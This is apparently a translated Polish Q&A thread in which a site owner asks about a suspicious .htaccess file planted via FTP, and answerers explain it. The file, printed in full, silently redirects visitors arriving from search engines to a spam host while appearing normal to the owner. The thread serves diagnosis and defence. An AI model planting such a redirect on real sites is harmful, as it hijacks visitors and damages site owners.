Podejrzany plik .htaccess

20

Zostało to przesłane do jednego z moich folderów FTP. Nie znam Apache, ale nadal jestem ciekawy - czy ktoś może mi powiedzieć, jakiego rodzaju niecne działanie ten plik próbuje popełnić? Dzięki!

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://SPAMMER.info/0/go.php?sid=2 [R,L]
owinofil
źródło
1
ŁADNY! (W złym sensie ...) Zasadniczo zabiera wszystkich, którzy przychodzą na twoją stronę z wyszukiwarki i przekierowuje ich do SPAMMER.info
KPWINC
Gdyby mi się to kiedyś zdarzyło. .htaccessPlik dodany do mojej strony miały około 40 pustych linii na górze, po prostu dalej mylić mnie.
TRiG

Odpowiedzi:

15

To wysyła użytkowników pochodzących z wyszukiwarki do ostatniej witryny SPAMMER.info(patrz historia pytań o rzeczywistą witrynę).

Szuka odsyłaczy próbujących się przed tobą ukryć , ponieważ prawdopodobnie nie uzyskujesz dostępu do witryny za pośrednictwem wyszukiwarek. Oznacza to, że jeśli przejdziesz bezpośrednio do adresu URL, wszystko wydaje się normalne. Jeśli jednak wejdziesz przez wyszukiwarkę, zostaniesz przekierowany.

Uwaga: nie ma to wpływu na roboty indeksujące, ponieważ ( przynajmniej googlebot ) nie ustawiają nagłówka strony odsyłającej.

Michael Haren
źródło
8

Za każdym razem, gdy użytkownik z wyszukiwarki znajdzie dowolną stronę w Twojej witrynie, zostanie przekierowany na stronę spamową .info.

Jest to bardzo podstępne - nic nie zauważysz, ponieważ zwykle wpisujesz adres.

Greg
źródło
1
Skoro patrzy na stronę odsyłającą, czy nie przekierowuje żadnych kliknięć w wyszukiwarce?
Czy to również nie wpływa na linki z Google? Np. Wyszukujesz witrynę OP w Google, klikasz ją i zostajesz przekierowany, skoro pochodzisz z Google?
Tak, linki tylko z wyszukiwarek (jak powiedziałem w mojej odpowiedzi), ale nie z wyszukiwarek / botów. Ta odpowiedź została zaktualizowana, więc jest teraz poprawna. Początkowo wskazywał, że dotyczy to tylko botów.
Michael Haren
1

aby dodać więcej - najprawdopodobniej wyciekły twoje dane uwierzytelniające ftp. być może masz je zapisane w filezilla / total commander itp. istnieje mnóstwo złośliwego oprogramowania kradnącego je, a następnie „chodzącego” - logowania się na konta ftp, dołączania złośliwego javascript do index.php / html lub umieszczania podobnych plików na nowo.

pQd
źródło
Mam do czynienia z tym problemem. Dzień po modyfikacji innego pliku .htaccess, co powoduje wewnętrzny błąd serwera.
vnix27